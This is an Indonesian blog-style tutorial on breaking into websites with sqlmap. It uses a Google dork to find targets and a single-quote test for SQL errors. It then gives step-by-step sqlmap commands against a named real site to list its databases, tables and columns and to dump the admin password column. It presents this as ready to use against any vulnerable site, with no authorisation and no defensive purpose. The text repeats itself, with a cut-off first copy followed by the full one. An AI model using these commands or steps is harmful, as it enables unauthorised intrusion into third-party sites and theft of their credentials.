Assalamu'alaikum sobat infun, selamat malam :), kali ini saya membagi tutorial gimana caranya hack website dengan sqlmap, totor ini mengunakan os kali linux sob, jd kalo os lain ngk sama, cuman berbeda sedikit, cuma dikit kok, hehe
okelah langsung saja simak baik-baik ya !!!
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 , seperti gambar berikut :
Jika menemukan tulisan tersebut, berarti kita kemungkinan besar kesempatan bisa hack atau retas atau tembus ke database web tersebut :D, jangan berbangga hati dulu, karena jika vuln begitu, belum tentu kita bisa tembus ke database web itu :v.
Next, Buka terminal ente lalu ketikkan : sqlmap -u http://www.bible-history.com/subcat.php?id=2 --dbs
tekan Enter
catatan : setelah syntax -u, sobat bisa ubah dengan web vuln yg sobat targetin dan tanda kutipnya dibuang, jgn dipake diterminal !
sebelumnya, mohon maaf yah yg punya web dijadiin bahan percobaan ane, lagian ngapain muncul di page 1 :v.
Setelah itu tunggu prosesnya, jika ada pertanyaan didalamnya, baca dulu aj, trus jawab sendiri :v,
jika berhasil, maka beberapa database akan ditampilkan diterminal kita, seperti berikut :
Databasenya yg diblok warna putih, dan kebetulan database web tersebut ada 5 :v,
jika sampai sini, kita bongkar tuh si database nya, yg sekiranya ada username sama passwordnya dengan cara :
sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D keywords --tables
catatan : Syntax -D yaitu untuk perintah mengeksekusi database, setelah syntax -D, masukkan database yg dipilih, disini ane pilih database yg "keywords".
nah, setelah dimasukkan perintah tersebut, isi database akan terbuka, seperti berikut :
nah selanjutanya kita eksekusi lagi tables database mana yg sekiranya terdapat user sama password admin webnya, karena kemungkinan user sama passwordnya ada di table admin, kita eksekusi table yg admin dengan mengetikkan perintah :
sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D keywords -T admin --columns
catatan : Syntax -T yaitu table mana yg akan kita eksekusi, disini ane pilih table admin :v
maka akan muncul lagi kolom dari tabel database admin seperti berikut :
Ini dia isi dari kolom database keywords, setelah itu, kita dump saja kira-kira apa isi dari pass di kolom tersebut dengan perintah :
sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D keywords -T admin -C pass --dump
setelah itu tekan enter, tunggu sebentar, dan taraa pass pun terbongkar
Dan ternyata passwornya itu, dan ternyata juga, sudah ada yg ngeretas juga si database web itu, karena passwordnya tercantum seperti gambar :v,
Jika sudah berhasil ngeretas begitu, kita tinggal cari page login adminnya, jika masih bingung cari page adminnya, tunggu postingan dari ane yah :v
oke sekian terima kasih atas kunjungannya ya sob
sumber
okelah langsung saja simak baik-baik ya !!!
Pertama dan yg paling penting, kita harus menentukan target kita,
caranya dengan menggunakan dork-nya google, dengan cara :
inurl:php?id= site:com (nah di site bisa diganti dengan code negara, misal jadi id untuk indonesia)
seperti ini :
Itu yg ane blok yg berwarna biru namanya dork, jadi hanya yg dimunculin yg kita mau aj yg berhubungan dengan dork tersebut.
langkah kedua yaitu nyari target yg vuln, atau yg tersedia celah untuk
kita iject, yaitu copy link yg berwarna hijau dibawah tulisan warna
biru, seperti ini :
setelah dicopy, buka tab baru, lalu pastekan ditempat pencarian URL dengan diberi tambahan petik atau ' , jadi seperti ini : www.bible-history.com/subcat.php?id=2' (ini calon target ane)
jika vulnerable, maka akan muncul tulisan berikut :
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 , seperti gambar berikut :
Jika menemukan tulisan tersebut, berarti kita kemungkinan besar kesempatan bisa hack atau retas atau tembus ke database web tersebut :D, jangan berbangga hati dulu, karena jika vuln begitu, belum tentu kita bisa tembus ke database web itu :v.
Next, Buka terminal ente lalu ketikkan : sqlmap -u http://www.bible-history.com/subcat.php?id=2 --dbs
tekan Enter
catatan : setelah syntax -u, sobat bisa ubah dengan web vuln yg sobat targetin dan tanda kutipnya dibuang, jgn dipake diterminal !
sebelumnya, mohon maaf yah yg punya web dijadiin bahan percobaan ane, lagian ngapain muncul di page 1 :v.
Setelah itu tunggu prosesnya, jika ada pertanyaan didalamnya, baca dulu aj, trus jawab sendiri :v,
jika berhasil, maka beberapa database akan ditampilkan diterminal kita, seperti berikut :
Databasenya yg diblok warna putih, dan kebetulan database web tersebut ada 5 :v,
jika sampai sini, kita bongkar tuh si database nya, yg sekiranya ada username sama passwordnya dengan cara :
sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D keywords --tables
catatan : Syntax -D yaitu untuk perintah mengeksekusi database, setelah syntax -D, masukkan database yg dipilih, disini ane pilih database yg "keywords".
nah, setelah dimasukkan perintah tersebut, isi database akan terbuka, seperti berikut :
nah selanjutanya kita eksekusi lagi tables database mana yg sekiranya terdapat user sama password admin webnya, karena kemungkinan user sama passwordnya ada di table admin, kita eksekusi table yg admin dengan mengetikkan perintah :
sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D keywords -T admin --columns
catatan : Syntax -T yaitu table mana yg akan kita eksekusi, disini ane pilih table admin :v
maka akan muncul lagi kolom dari tabel database admin seperti berikut :
Ini dia isi dari kolom database keywords, setelah itu, kita dump saja kira-kira apa isi dari pass di kolom tersebut dengan perintah :
sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D keywords -T admin -C pass --dump
setelah itu tekan enter, tunggu sebentar, dan taraa pass pun terbongkar
Dan ternyata passwornya itu, dan ternyata juga, sudah ada yg ngeretas juga si database web itu, karena passwordnya tercantum seperti gambar :v,
Jika sudah berhasil ngeretas begitu, kita tinggal cari page login adminnya, jika masih bingung cari page adminnya, tunggu postingan dari ane yah :v
oke sekian terima kasih atas kunjungannya ya sob
sumber
